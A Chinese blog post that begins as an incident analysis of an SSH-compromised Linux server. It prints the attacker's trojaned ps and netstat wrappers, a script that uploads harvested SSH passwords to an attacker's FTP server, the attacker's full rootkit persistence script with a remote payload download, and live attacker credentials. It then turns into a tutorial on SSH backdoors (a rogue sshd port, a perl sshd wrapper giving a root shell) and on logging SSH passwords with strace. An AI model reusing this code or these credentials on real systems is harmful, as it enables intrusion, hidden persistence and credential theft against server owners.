某日哥们的负责的服务器因为SSH弱口令被黑了(又是边界安全意识的问题),看到异常的进程信息如下:

123

lsof看一下打开的文件,发现/dev/g下存在这些东西

123

然后习惯性的按照时间排序查看一下命令,因为root已经被拿了所以非常有可能已经修改了命令。然后看到ps和netstat都非常小,这太不正常了。

-rwxr-xr-x 1 root root 78 Apr 30  2016 /bin/netstat
strings netstat
#!/bin/sh
for arg in "$*";do
.Fnetstat $arg|grep -v "125.77.31.197";done;exit

发现其实执行的是Fnetstat
ps也被替换了,最终执行的Fps

[root@localhost tmp]# strings /bin/ps
#!/bin/sh
for arg in "$*";do
.Fps $arg|grep -v ".syslogd--system"|grep -v "a8137c40f9"|grep -v "ps"|grep -v "grep"|grep -v "nslookup"|grep -v "mail";done;exit

cron.hourly下的三个脚本mail.sh、mail.py、ssh_deny.sh

123

先来看ssh_deny.sh

123

/dev/black.txt记录的是SSH登录失败的IP及次数

pt是SSH的监听端口

脚本功能就是使用iptables封禁登录失败次数大于3次的IP

mail.py是一个发送邮件的脚本,会将/dev/1.txt发送出去。

从脚本中可以看到两个账号

user=’success501@163.com’,passwd=’ff1314′

还有一个qq邮箱995999349@qq.com

然后看mail.sh

#!/bin/bash
S=`date +%s%N | md5sum | head -c 10`
ip=`ifconfig |grep inet| sed -n '1p'|awk '{print $2}'|awk -F ':' '{print $2}'`
pt=`netstat -ntlp | awk '!a[$NF]++ && $NF~/sshd$/{sub (".*:","",$4);print $4}'`
Add=`nslookup www.1024kbs.com|grep "Address: "|awk '{print $2}'`

mv /dev/1.txt /dev/"$ip"+1+"$pt"+"$S".txt;mv /dev/2.txt /dev/"$ip"+2+"$pt"+"$S".txt
curl -u root:ff1314 -T "{/dev/"$ip"+1+"$pt"+"$S".txt,/dev/"$ip"+2+"$pt"+"$S".txt}" ftp://$Add:888
rm -rf /dev/"$ip"+1+"$pt"+"$S".txt /dev/"$ip"+2+"$pt"+"$S".txt

可以看出是将/dev/1.txt和/dev/2.txt重命名后上传到FTP上,然后删除掉。估计这里被装了SSH后门,1.txt和2.txt就是记录密码的文件,不过SSH被哥们的同事重装了,这里看不出来了,然后登下FTP看看。登上FTP服务器发现在几个密码文件

ftp> open www.1024kbs.com 888
Connected to www.1024kbs.com (118.193.212.86).
220 Welcome to www.Gxnn.com FTP Server!
Name (www.1024kbs.com:root): root
331 Password required for root
Password:
230 User successfully logged in.
Remote system type is Base.
ftp> ls
227 Entering Passive Mode (118,193,212,86,4,88).
150 Opening ASCII mode data connection for directory list.
-rwx------ 1 user group              7 Nov 18 11:52 116.211.17.5+1+22+426e95d58e.txt
-rwx------ 1 user group              6 Nov 18 11:52 116.211.17.5+1+22+9ada1f5efb.txt
-rwx------ 1 user group             32 Nov 18 14:48 116.211.17.5+1+22+b500d80263.txt
-rwx------ 1 user group              7 Nov 18 11:52 116.211.17.5+2+22+426e95d58e.txt
-rwx------ 1 user group              6 Nov 18 11:52 116.211.17.5+2+22+9ada1f5efb.txt
-rwx------ 1 user group             50 Nov 18 14:55 221.229.164.18+1+22+8e46e6b7d4.txt
226 Transfer complete.
ftp>

又是其他受害者的SSH信息。搜索是995999349看到一篇文章。http://blog.chinaunix.net/uid-25057421-id-5195167.html发现了攻击者的脚本。

#! /bin/bash
#chkconfig:12345 90 90
#############################################
#############################################
#############################################
#############################################
#############################################
path=`pwd`
exit0="exit 0"
Fss="/usr/bin/.Fss"
Fps="/usr/bin/.Fps"
Fnet="/usr/bin/.Fnetstat"
LockAngel="/usr/bin/zfgsr"
Fssbak="/usr/bin/dpkgd/ss"
Fpsbak="/usr/bin/dpkgd/ps"
Fnetbak="/usr/bin/dpkgd/netstat"
MyFileAngel="/etc/init.d/.dbus-daemon--system"
PuppetAngel="/usr/bin/.dbus-daemon--system.bak"
allow="/etc/allow.bak"
Fconfig="/sbin/Fconfig.n"
S99="/etc/rc.d/init.d/S99.25000"
if [ ! -f  "$Fconfig" ];then
echo byqinshou 995999349 > $Fconfig
zfgsr +ia $Fconfig >/dev/null 2>&1
fi
Address1=`nslookup www.120kongbao.com|grep "Address: "|awk '{print $2}'`
if [ -z "$Address1" ];then
zfgsr -ia /etc/resolv.conf
echo 'nameserver 114.114.114.114'>/etc/resolv.conf
echo 'nameserver 8.8.8.8'>>/etc/resolv.conf
touch -d "2010-06-7 08:10:30"  /etc/resolv.conf
zfgsr +ia /etc/resolv.conf
fi
Ftempbash=`cat $Fconfig | awk '{print $2}'`   #现脚本文件名
Fbashtemp="/usr/bin/"$Ftempbash #现脚本路径
Fbashname=`date +%s%N | md5sum | head -c 10`
Fbashpath="/usr/bin/"$Fbashname #新脚本路径
if [ $0 != "$Fbashtemp" ];then
pkill $Ftempbash;killall $Ftempbash
zfgsr -ia /usr/bin/$Ftempbash;rm -f /usr/bin/$Ftempbash
zfgsr -ia $PuppetAngel;rm -f $PuppetAngel
fi
# -------------------------------------------------------------
if [ ! -f  "$LockAngel" ];then
zfgsr -ia $LockAngel
rm -rf $LockAngel
cp -f /usr/bin/chattr $LockAngel
cp -f /usr/bin/chattr /usr/bin/.zfgsr
cp -f /usr/bin/.zfgsr $LockAngel
chmod 777 $LockAngel
chmod 777 /usr/bin/.zfgsr
touch -d "2011-06-7 08:10:30"  $LockAngel
touch -d "2011-06-7 08:10:30"  /usr/bin/.zfgsr
rm -rf /usr/bin/chattr
zfgs +ia $LockAngel >/dev/null 2>&1
fi
#删除原chattr命令,并复制chattr为/usr/bin/.zfgsr和/usr/bin/zfgsr /usr/bin/zfgsr添加ai属性,不可增删改
if [ -f /usr/sbin/ss ];then
if [ ! -f "$Fss" ];then
if [ ! -f "$Fssbak" ];then
mkdir /usr/bin/dpkgd/
cp -f /usr/sbin/ss $Fssbak
cp -f /usr/sbin/ss $Fss
else
cp -f $Fssbak $Fss
fi
zfgsr -ia /usr/sbin/ss
rm -rf /usr/sbin/ss
echo '#!/bin/sh' > /usr/sbin/ss
echo '.Fss|grep -v "'$Address1'"' >> /usr/sbin/ss
echo 'exit' >> /usr/sbin/ss
chmod 0755 $Fss;chmod 0755 /usr/sbin/ss
zfgsr +ia /usr/sbin/ss >/dev/null 2>&1
zfgsr +ia $Fssbak >/dev/null 2>&1
zfgsr +ia $Fss >/dev/null 2>&1
fi
fi
#修改ss命令
if [ -f /bin/netstat ];then
if [ ! -f "$Fnet" ];then
if [ ! -f "$Fnetbak" ];then
mkdir /usr/bin/dpkgd/
cp -f /bin/netstat $Fnetbak
cp -f /bin/netstat $Fnet
else
cp -f $Fnetbak $Fnet
fi
zfgsr -ia /bin/netstat
rm -rf /bin/netstat
echo '#!/bin/sh' > /bin/netstat
echo 'for arg in "$*";do' >> /bin/netstat
echo '.Fnetstat $arg|grep -v "'$Address1'";done;exit' >> /bin/netstat
chmod 0755 $Fnet;chmod 0755 /bin/netstat
zfgsr +ia /bin/netstat >/dev/null 2>&1
zfgsr +ia $Fnetbak >/dev/null 2>&1
zfgsr +ia $Fnet >/dev/null 2>&1
fi
fi
#修改netstat
if [ -f /bin/ps ];then
if [ ! -f "$Fps" ];then
if [ ! -f "$Fpsbak" ];then
mkdir /usr/bin/dpkgd/
cp -f /bin/ps $Fpsbak
cp -f /bin/ps $Fps
else
cp -f $Fpsbak $Fps
fi
zfgsr -ia /bin/ps
rm -rf /bin/ps
echo '#!/bin/sh' > /bin/ps;echo 'for arg in "$*";do' >> /bin/ps
echo '.Fps $arg|grep -v "'.dbus-daemon--system'"|grep -v "'$Fbashname'"|grep -v "ps"|grep -v "grep";done;exit' >> /bin/ps
chmod 0755 $Fps;chmod 0755 /bin/ps
zfgsr +ia /bin/ps >/dev/null 2>&1
zfgsr +ia $Fpsbak >/dev/null 2>&1
zfgsr +ia $Fps >/dev/null 2>&1
fi
fi
#修改ps命令,屏蔽了ps、grep等显示
if [ ! -f  "$allow" ];then
cp -f /etc/hosts.allow $allow
zfgsr +ia $allow >/dev/null 2>&1
fi
# by qinshou -----------------------------------------------
ExistAngel=`.Fps aux | grep .dbus-daemon--system | grep -v "grep" |wc -l`
if [ $ExistAngel != 1 ];then
zfgsr -ia /usr/bin/.dbus-daemon--system
rm -rf /usr/bin/.dbus-daemon--system
cp -f /usr/bin/.dbus-daemon--system.bak /usr/bin/.dbus-daemon--system
chmod 777 /usr/bin/.dbus-daemon--system
/usr/bin/.dbus-daemon--system
  rm -rf /usr/bin/.dbus-daemon--system
fi
if [ ! -f  "$MyFileAngel" ];then
  zfgs -i /usr/bin/wget
  zfgs -a /usr/bin/wget
chmod 777 /usr/bin/wget
wget -P /etc/ http://www.120kongbao.com:999/1000.exe
zfgs -i $MyFileAngel
zfgs -a $MyFileAngel
rm -rf $MyFileAngel
chmod 777 /etc/1000.exe
mv -f /etc/1000.exe $MyFileAngel
zfgs +i $MyFileAngel
zfgs +a $MyFileAngel
chmod 0 /usr/bin/wget
zfgs +i /usr/bin/wget
zfgs +a /usr/bin/wget
fi
if [ ! -f  "$PuppetAngel" ];then
cp -f $MyFileAngel $PuppetAngel
zfgs +i $PuppetAngel
zfgs +a $PuppetAngel
fi
iptable=`iptables -L INPUT|grep $Address1|awk '{print $1 $4}'`
if [ -z "$iptable" ];then
iptables -I INPUT -s $Address1 -j ACCEPT
else
iptables -D INPUT -s $Address1 -j DROP
fi
# 自启动------------------
if [ ! -f  "$S99" ];then
echo "#!/bin/sh" >> $S99
echo "# chkconfig: 12345 90 90" >> $S99
echo "# description: $Ftempbash" >> $S99
echo "### BEGIN INIT INFO" >> $S99
echo "# Provides:	$Ftempbash" >> $S99
echo "# Required-Start:	" >> $S99
echo "# Required-Stop:	" >> $S99
echo "# Default-Start:	1 2 3 4 5" >> $S99
echo "# Default-Stop:	" >> $S99
echo "# Short-Description:	$Ftempbash" >> $S99
echo "### END INIT INFO" >> $S99
echo 'case $1 in' >> $S99
echo "start)" >> $S99
echo "	$Fbashpath" >> $S99
echo "	;;" >> $S99
echo "stop)" >> $S99
echo "	;;" >> $S99
echo "*)" >> $S99
echo "	$Fbashpath" >> $S99
echo "	;;" >> $S99
echo "esac" >> $S99
fi
# by qinshou -----------------------------------------------
zfgsr -ia $Fconfig;zfgsr -ia $0;zfgsr -ia $Fbashpath
sed -i "s|$Ftempbash|$Fbashname|" $Fconfig
zfgsr +ia $Fconfig >/dev/null 2>&1
cp -f $0 $Fbashpath;rm -f $0;chmod 0755 $Fbashpath
# by qinshou -----------------------------------------------
if [ -z "`$S99|grep "$Fbashtemp"`" ]; then
sed -i "s|$Ftempbash|$Fbashname|" $S99
chmod 777 $S99
fi
# by qinshou -----------------------------------------------
zfgsr -ia /usr/bin/chattr;rm -f /usr/bin/chattr
zfgsr -ia /etc/hosts.allow;cp -f $allow /etc/hosts.allow;zfgsr +ia /etc/hosts.allow >/dev/null 2>&1
sleep 1;zfgsr -ia $Fbashpath;chmod 0755 $Fbashpath;nohup $Fbashpath >/dev/null 2>&1 &
# by qinshou -----------------------------------------------
zfgsr -ia /bin/ps;sed -i "s|$Ftempbash|$Fbashname|" /bin/ps
zfgsr -ia /bin/netstat;chmod 0755 /bin/netstat;chmod 0755 /bin/ps
zfgsr +ia /bin/netstat >/dev/null 2>&1
zfgsr +ia /bin/ps >/dev/null 2>&1
# by qinshou -----------------------------------------------
exit

 

1. 入侵得到SHELL后,对方防火墙没限制,想快速开放一个可以访问的SSH端口。
在kali下测试。必须是root权限。

root@kali-vincent:~# ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337;
ssh root@172.16.100.128 -p 31337
密码随意输入

检查进程

root@kali-vincent:/tmp# ps axu | grep 31337 | grep -v grep
root 85815 0.0 0.1 55164 2964 ? Ss 12:27 0:00 /tmp/su -oPort=31337

检查端口

root@kali-vincent:/tmp# netstat -antlp | grep 31337
tcp 0 0 0.0.0.0:31337 0.0.0.0:* LISTEN 85815/su 
tcp6 0 0 :::31337 :::* LISTEN 85815/su

可以看出该后门很容易检查出来

2.做一个SSH wrapper后门,效果比第一个好,没有开放额外的端口,只要对方开了SSH服务,就能远程连接。
在肉鸡上执行:

[root@localhost ~]# cd /usr/sbin
[root@localhost sbin]# mv sshd ../bin
[root@localhost sbin]# echo '#!/usr/bin/perl' >sshd
[root@localhost sbin]# echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' >>sshd
[root@localhost sbin]# echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd
[root@localhost sbin]# chmod u+x sshd
[root@localhost sbin]# /etc/init.d/sshd restart

在本机执行:

socat STDIO TCP4:10.18.180.20:22,sourceport=13377

[root@vincenthostname socat-1.4]# ./socat STDIO TCP4:172.16.100.128:22,sourceport=13377

whoami
root

这个后门检测起来也简单,/usr/sbin/sshd文件非二进制文件,而是脚本文件,并且文件大小很小。

3. 记录SSH客户端连接密码

[test@CentOS tmp]$ alias ssh='strace -o /tmp/sshpwd.log -e read,write,connect -s2048 ssh'
[test@CentOS tmp]$ grep "read(4" /tmp/sshpwd.log 
read(4, "y", 1) = 1
read(4, "e", 1) = 1
read(4, "s", 1) = 1
read(4, "\n", 1) = 1
read(4, "h", 1) = 1
read(4, "e", 1) = 1
read(4, "h", 1) = 1
read(4, "e", 1) = 1
read(4, "\n", 1) = 1
read(4, "e", 16384) = 1
read(4, "x", 16384) = 1
read(4, "i", 16384) = 1
read(4, "t", 16384) = 1
read(4, "\r", 16384) = 1